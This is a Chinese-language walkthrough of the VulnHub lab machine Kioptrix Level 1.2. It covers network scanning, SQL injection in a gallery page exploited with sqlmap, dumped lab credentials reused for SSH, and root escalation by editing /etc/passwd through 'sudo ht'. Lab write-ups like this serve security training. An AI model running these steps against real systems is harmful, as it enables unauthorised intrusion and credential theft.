VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

  • 环境下载
  • KIOPTRIX: LEVEL 1靶机搭建
  • 渗透测试
    • 信息搜集
    • 漏洞挖掘
    • getshell
    • 提权

环境下载

戳此进行环境下载

KIOPTRIX: LEVEL 1靶机搭建

将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
得到目标靶机的IP为:192.168.246.135

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第1张图片

用Nmap探测一下目标靶机IP的端口信息:sudo nmap -sS -A 192.168.246.135,发现开放了22和80两个端口

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第2张图片

用dirb扫描一下web目录:dirb http://192.168.246.135

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第3张图片

漏洞挖掘

测试后发现需要添加一个host

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第4张图片

发现http://192.168.246.135/gallery/gallery.php?id=1存在SQL注入漏洞

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第5张图片

利用sqlmap得到数据库名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 --dbs

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第6张图片

利用sqlmap得到gallery数据库中的表名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery --tables

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第7张图片

利用sqlmap得到gallery数据库中的表名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第8张图片

得到一组用户名和密码:admin:n0t7t1k4

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第9张图片

在另一个表dev_accounts中,得到了两组用户名和密码

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第10张图片

dreg:Mast3r
loneferret:starwars

getshell

利用上述得到的信息,发现后两组用户名和密码可以成功连接ssh

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第11张图片

提权

查看/etc/passwd发现loneferret用户存在利用点

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第12张图片

查看loneferret用户家目录下信息

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第13张图片

根据提示,使用sudo ht命令,修改/etc/passwd中loneferret用户和root用户一样

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第14张图片

重新连接ssh,发现成功提权到root用户

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2_第15张图片

你可能感兴趣的:(#,VulnHub,VulnHub,渗透测试,安全,linux)